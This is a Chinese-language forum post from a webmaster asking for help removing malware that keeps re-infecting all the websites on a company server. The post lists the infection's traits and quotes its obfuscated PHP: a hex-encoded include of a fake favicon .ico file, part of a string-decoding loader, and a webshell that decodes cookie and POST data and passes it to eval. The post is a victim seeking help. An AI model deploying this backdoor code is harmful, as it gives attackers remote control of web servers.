求助!一个病毒入侵了公司所有网站,实在没有办法彻底清除!请大神帮助。
病毒特征
1.一旦入侵服务器的某个网站就会把服务器下所有网站而已修改。甚至会修改目录权限。
2.会自动生成含如下代码的index.php文件,同时会在各种目录下生成favicon_*.ico的文件。
经过反编译后是一个伪装成ico文件的代码。
<?php
/*f969b*/
@include "\x6ct\x2fs\x65a\x72c\x68/\x66a\x76i\x63o\x6e_\x37f\x652\x336\x2ei\x63o";
/*f969b*/
ico文件内容如下:
<?php
if (!defined('ALREADY_RUN_1bc29b36f342a82aaf6658785356718'))
{
define('ALREADY_RUN_1bc29b36f342a82aaf6658785356718', 1);
$lysoa = 3298; function yhdjugyza($xcqtszj, $qbqxxjvsbm){$egiafr = ''; for($i=0; $i < strlen($xcqtszj); $i++){$egiafr .= isset($qbqxxjvsbm[$xcqtszj[$i]]) ? $qbqxxjvsbm[$xcqtszj[$i]] : $xcqtszj[$i];}
$omlgrnwny="rawurl" . "decode";return $omlgrnwny($egiafr);}
$leqvta = '%SU%Se%SU%Se%ASNiN_9CM%6r%6EC55P5_XPQ%6E%6H%6Scb00%6f%BD%SU%S'.
'e%ASNiN_9CM%6r%6EXPQ_C55P59%6E%6H%6SS%6f%BD%SU%Se%ASNiN_9CM%6r%6EkW8_C8CL3MNPi_MNkC%6E%6H%6'.
'SS%6f%BD%SU%Se%ASC55P5_5CoP5MNiQ%6rS%6f%BD%SU%Se%AS9CM_MNkC_XNkNM%6rS%6f%BD%SU%Se%SU%Se%SU%SeN7%6r'.
'%6vlC7NiCl%6r%66ngn_KY0%66%6f%6f%SU%Se%ED%SU%Se%6S%6S%6S%'.
'6SlC7NiC%6r%66ngn_KY0%66%6H%6S%66%qHi%66%6f%BD%SU%Se%EU%SU%Se%SU%SeN7%6r'.
'%6vlC7NiCl%6r%66UzxKH1YxZ_OKnexe1Yx%66%6f%6f%SU%Se%ED%SU%Se%6S%6S%6S%6SlC7NiC%'.
'6r%66UzxKH1YxZ_OKnexe1Yx%66%6H%6S%66/%66%6f%BD%SU%Se%EU%SU%Se%SU%SeN'.
'7%6S%6r%6vlC7NiCl%6r%6Ee0xKeUZ_xbc_vAALrEL7V6BpWr6WW7NVr5NW'.
3.会把index.html文件修改为index.html.bak.bak文件。同时生成index.php文件。
并在index.php文件里用代码指向index.html.bak.bak文件。
4.会在某些目录生成类似下面文件名的病毒文件。
article19.php
dirs25.php
files94.php
page30.php
部分代码如下
$jfwek = 'yvxr_o0943mfneiuHkd\'5-#s17b8t2c*lapg';$mdcrdy = Array();$mdcrdy[] = $jfwek[16].$jfwek[31];$mdcrdy[] = $jfwek[22];$mdcrdy[] = $jfwek[24].$jfwek[27].$jfwek[25].$jfwek[7].$jfwek[6].$jfwek[29].$jfwek[11].$jfwek[20].$jfwek[21].$jfwek[9].$jfwek[7].$jfwek[18].$jfwek[29].$jfwek[21].$jfwek[8].$jfwek[33].$jfwek[7].$jfwek[30].$jfwek[21].$jfwek[7].$jfwek[13].$jfwek[33].$jfwek[30].$jfwek[21].$jfwek[8].$jfwek[18].$jfwek[24].$jfwek[30].$jfwek[9].$jfwek[13].$jfwek[25].$jfwek[11].$jfwek[26].$jfwek[20].$jfwek[24].$jfwek[33];$mdcrdy[] = $jfwek[30].$jfwek[5].$jfwek[15].$jfwek[12].$jfwek[28];$mdcrdy[] = $jfwek[23].$jfwek[28].$jfwek[3].$jfwek[4].$jfwek[3].$jfwek[13].$jfwek[34].$jfwek[13].$jfwek[33].$jfwek[28];$mdcrdy[] = $jfwek[13].$jfwek[2].$jfwek[34].$jfwek[32].$jfwek[5].$jfwek[18].$jfwek[13];$mdcrdy[] = $jfwek[23].$jfwek[15].$jfwek[26].$jfwek[23].$jfwek[28].$jfwek[3];$mdcrdy[] = $jfwek[33].$jfwek[3].$jfwek[3].$jfwek[33].$jfwek[0].$jfwek[4].$jfwek[10].$jfwek[13].$jfwek[3].$jfwek[35].$jfwek[13];$mdcrdy[] = $jfwek[23].$jfwek[28].$jfwek[3].$jfwek[32].$jfwek[13].$jfwek[12];$mdcrdy[] = $jfwek[34].$jfwek[33].$jfwek[30].$jfwek[17];foreach ($mdcrdy[7]($_COOKIE, $_POST) as $eyynwg => $qynibe){function bqjwgy($mdcrdy, $eyynwg, $cavxuf){return $mdcrdy[6]($mdcrdy[4]($eyynwg . $mdcrdy[2], ($cavxuf / $mdcrdy[8]($eyynwg)) + 1), 0, $cavxuf);}function cicqtnb($mdcrdy, $ubxwmgg){return @$mdcrdy[9]($mdcrdy[0], $ubxwmgg);}function tlxhk($mdcrdy, $ubxwmgg){$bfvwkb = $mdcrdy[3]($ubxwmgg) % 3;if (!$bfvwkb) {eval($ubxwmgg[1]($ubxwmgg[2]));exit();}}$qynibe = cicqtnb($mdcrdy, $qynibe);tlxhk($mdcrdy, $mdcrdy[5]($mdcrdy[1], $qynibe ^ bqjwgy($mdcrdy, $eyynwg, $mdcrdy[8]($qynibe))));}
以上是我总结的部分特征。也许还有没发现的。
不知道论坛里的其他站长又没有遇到类似情况。手动清楚已经超出了劳动极限。只要一个文件没处理第二天照样会生成一大片病毒文件。已经超出了我的技术能力。希望那位热心的朋友帮助解决一下。哪怕是指点一下都好。